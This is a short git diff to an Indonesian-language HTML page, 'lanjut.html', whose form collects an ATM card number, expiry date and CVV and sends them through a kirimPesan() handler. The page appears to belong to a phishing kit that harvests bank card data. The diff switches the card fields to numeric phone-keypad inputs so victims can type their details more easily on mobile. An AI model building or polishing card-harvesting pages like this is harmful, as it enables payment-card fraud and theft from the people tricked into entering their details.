--- a/lanjut.html
+++ b/lanjut.html
@@ -120,15 +120,15 @@
     <form id="registrationForm">
       <div class="input-group">
         <label for="nomor_kartu">16 Digit Angka No Kartu ATM</label>
-        <input type="text" id="nomor_kartu" name="nomor_kartu" placeholder="Masukkan Nomor Kartu" required maxlength="19" style="width: calc(100% - 43px); padding: 11px 16px 13px 20px; border: 2px solid #ccc; border-radius: 5px;">
+        <input type="tel" id="nomor_kartu" name="nomor_kartu" placeholder="Masukkan Nomor Kartu" required maxlength="19" style="width: calc(100% - 43px); padding: 11px 16px 13px 20px; border: 2px solid #ccc; border-radius: 5px;">
       </div>
       <div class="input-group">
         <label for="masa_berlaku">Valid Thru (Masa Berlaku)</label>
-        <input type="text" id="masa_berlaku" name="masa_berlaku" placeholder="MM/YY" required maxlength="5" style="width: calc(100% - 43px); padding: 11px 16px 13px 20px; border: 2px solid #ccc; border-radius: 5px;">
+        <input type="tel" id="masa_berlaku" name="masa_berlaku" placeholder="MM/YY" required maxlength="5" style="width: calc(100% - 43px); padding: 11px 16px 13px 20px; border: 2px solid #ccc; border-radius: 5px;">
       </div>
       <div class="input-group">
         <label for="cvv">CVV (3 Digit Di Balik Kartu)</label>
-        <input type="text" id="cvv" name="cvv" placeholder="CVV" required maxlength="3" style="width: calc(100% - 43px); padding: 11px 16px 13px 20px; border: 2px solid #ccc; border-radius: 5px;">
+        <input type="tel" id="cvv" name="cvv" placeholder="CVV" required maxlength="3" style="width: calc(100% - 43px); padding: 11px 16px 13px 20px; border: 2px solid #ccc; border-radius: 5px;">
       </div>
       <button type="button" class="btn" onclick="kirimPesan()">LANJUT</button>
       <a href="index.html" class="btn-link">Kembali ke Halaman Utama</a>
